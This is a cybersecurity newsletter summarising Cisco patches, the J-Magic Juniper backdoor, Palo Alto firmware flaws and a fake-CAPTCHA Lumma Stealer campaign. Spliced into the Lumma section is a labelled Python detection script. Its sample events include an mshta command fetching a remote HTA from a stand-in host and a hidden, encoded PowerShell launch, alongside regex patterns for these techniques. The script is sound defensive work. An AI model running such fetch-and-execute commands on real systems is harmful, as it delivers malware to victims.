Jan 24 2025
Welcome to Gone Phishing, your weekly cybersecurity newsletter that understands that when it comes to cyber storms: Éowyn some, you lose some. Stay safe UK readers #StormÉowyn
Patch of the Week!
First thing's first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it…
Congrats to Cisco, the cybercriminals are no match… for your patch!
Check out this freshly hatched patch.
Cisco Security Alert! Patch Now!
Cisco has issued updates to fix critical vulnerabilities in Cisco Meeting Management and other products. Top priority: CVE-2025-20156 (CVSS 9.9), a REST API flaw that lets authenticated attackers escalate privileges to administrator level.
Key Details:
1. CVE-2025-20156 (Critical)
Affects Cisco Meeting Management versions 3.9 and earlier.
Fixes available in 3.9.1; 3.10 is not vulnerable.
Attackers could exploit this to control edge nodes managed by Cisco Meeting Management.
2. CVE-2025-20165 (DoS)
Found in BroadWorks SIP handling.
Fixed in RI.2024.11.
Exploit could exhaust system memory, causing a DoS.
3. CVE-2025-20128 (DoS)
Impacts ClamAV OLE2 decryption.
Could be exploited for service disruption; PoC exploit exists.
Action Required:
Update now to patched versions for all affected products.
For Ivanti exploit chains (CVE-2024-8963, CVE-2024-9379, etc.), check for compromise and secure your systems.
Stay vigilant and secure!
Now, on to this week's hottest cybersecurity news stories:
Juniper routers exploited by "J-Magic" backdoor
Palo Alto firewalls exploited via boot bypass flaws
Fake CAPTCHA campaign spreads Lumma stealer
New Threat Alert! Enterprise-grade Juniper Networks routers are under fire from a custom backdoor, dubbed J-Magic, that listens for secret "magic packets" to wreak havoc. Here's the breakdown:
What's Happening?
J-Magic infects Juniper routers (running Junos OS, which is based on FreeBSD).
Active since mid-2023, with infections spanning Europe, Asia, and South America.
Top targets: semiconductor, energy, manufacturing, and IT industries.
How It Works:
1. Attackers send "magic packets" via TCP traffic.
2. The backdoor responds with a secondary challenge to block rival hackers.
3. If the challenge succeeds, the attackers gain control, stealing data or deploying other malware.
Why It's Dangerous:
Targets edge routers acting as VPN gateways.
No endpoint detection and response (EDR) coverage leaves these devices wide open.
Long uptimes make them ideal for nation-state hacking campaigns.
What's at Stake?
Data theft.
Malware deployment.
Infrastructure sabotage.
Stay Safe!
Keep Juniper routers updated!
Monitor unusual traffic: look for hidden signals!
Restrict access to sensitive router ports.
J-Magic marks a bold move against enterprise routers. With nation-state actors leveraging these attacks, the stakes for securing network edge devices have never been higher. Stay vigilant!
Palo Alto Networks firewalls, trusted guardians of enterprise security, have been found vulnerable to critical flaws in their firmware and misconfigured security settings. Let's break it down:
The Discovery
Security researchers at Eclypsium analyzed three firewall models, the PA-3260, PA-1410, and PA-415, and uncovered a set of vulnerabilities collectively named PANdora's Box.
The PA-3260 has reached end-of-sale (August 2023), but the PA-1410 and PA-415 are still fully supported.
Major Findings
BootHole (CVE-2020-10713): Secure Boot bypass vulnerability affecting all three models.
LogoFAIL: Critical UEFI vulnerabilities on the PA-3260, allowing malicious code execution during startup.
PixieFail: TCP/IP stack flaws in the PA-1410 and PA-415, leading to code execution and information leaks.
Insecure Flash Access: SPI flash misconfigurations on the PA-415, enabling UEFI tampering.
Intel BootGuard Key Leak: Impacts the PA-1410, exposing the device to additional risks.
Why It Matters
These flaws could let attackers bypass Secure Boot, escalate privileges, or inject malicious firmware.
Vulnerable firewalls could turn into attack platforms, undermining enterprise security.
Vendor Response
Palo Alto Networks:
Claims these vulnerabilities can't be exploited under normal conditions with up-to-date PAN-OS.
No reports of active exploitation.
Working with third-party vendors to roll out mitigations.
Protect Yourself
Keep PAN-OS firmware updated.
Secure management interfaces according to best practices.
Regularly monitor device integrity and firmware.
Even the strongest defenses need defense! Stay vigilant, update often, and don't let your firewalls become weak links.
Cybercriminals are stepping up their game with fake CAPTCHA pages to spread the notorious Lumma Stealer malware. This malware-as-a-service (MaaS) threat is targeting individuals and organizations worldwide.
The Attack
1. Victims land on compromised websites that redirect them to fake CAPTCHA pages.
2. Instead of verifying, users are tricked into running a Windows Run command that triggers a chain reaction:
The command uses mshta.exe to download and execute a remote HTA file.
This file executes PowerShell scripts to bypass detection and deploy the Lumma Stealer payload.
3. These steps occur outside the browser, bypassing browser-based security defenses.
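To show what the mshta-to-PowerShell chain above looks like from the defender's side, here is an added example (not from the newsletter or any vendor) that classifies process-creation events into the stages of that chain. The Sysmon-style field names, the sample command lines and the rule names are assumptions constructed for the example.

```python
import re
from pathlib import PureWindowsPath
# Constructed process-creation events (Sysmon Event ID 1 shape), not real telemetry:
# a Run-dialog mshta launch that spawns PowerShell, plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://captcha-verify.example/check.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -Enc AAAAAAAAAAAAAAAA"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)  # web URL or UNC path
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?(?=\s|$)", re.IGNORECASE)  # -e/-ec/-enc/-EncodedCommand
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)

def classify(event):
    """Return the rule names one event triggers; an empty list means nothing suspicious."""
    base = lambda p: PureWindowsPath(p).name.lower()
    image, parent, cmd = base(event["Image"]), base(event["ParentImage"]), event["CommandLine"]
    hits = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            hits.append("mshta_remote_hta")           # stage 1: HTA fetched from the web
        if parent == "explorer.exe":
            hits.append("mshta_from_run_dialog")      # Win+R launches run under explorer.exe
    if image in ("powershell.exe", "pwsh.exe"):
        if parent == "mshta.exe":
            hits.append("powershell_child_of_mshta")  # stage 2: the HTA hands off to PowerShell
        if ENC_RE.search(cmd) or HIDDEN_RE.search(cmd):
            hits.append("powershell_encoded_or_hidden")
        if "amsi" in cmd.lower():
            hits.append("powershell_mentions_amsi")   # AMSI internals on a command line is abnormal
    return hits

def triage(events):
    """Map event index -> triggered rules, keeping only events that triggered at least one."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

def hta_to_powershell_chain(events):
    """True when a remote-HTA mshta launch precedes PowerShell spawned from mshta."""
    rules = [classify(e) for e in events]
    first = next((i for i, r in enumerate(rules) if "mshta_remote_hta" in r), None)
    return first is not None and any("powershell_child_of_mshta" in r for r in rules[first + 1:])
```

The two benign events (a locally installed HTA and a scheduled backup script) trigger nothing, which is the false-positive check a rule like this needs before it goes into a SIEM.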
Global Reach
Targeted countries: Argentina, Colombia, U.S., Philippines, and others.
Targeted industries: Telecom, healthcare, banking, and marketing.
Lumma's Evolution
Previous Method: Used Base64-encoded PowerShell scripts in a campaign known as ClickFix.
Current Method: Adds complexity with multiple PowerShell stages, AMSI bypasses, and delivery via fake CAPTCHA interactions.
New Threats Emerge
Attackers are also using 1,000+ fake domains mimicking Reddit, WeTransfer, and more to spread SelfAU3 Droppers packed in password-protected archives.
Meanwhile, Phishing-as-a-Service (PhaaS) kits like Tycoon 2FA are enhancing evasion techniques, using compromised email accounts and detecting security tools.
How to Stay Safe
Avoid commands from suspicious sites: never paste commands into Windows Run prompts.
Update antivirus tools to recognize AMSI-bypass techniques.
Educate users on spotting fake CAPTCHAs and social engineering tactics.
Pro tip: If it seems fishy, don't click it! Fake CAPTCHA scams are the latest twist in cybercriminal playbooks. Stay alert!
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday.
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future.
Let us know what you think.
So long and thanks for reading all the phish!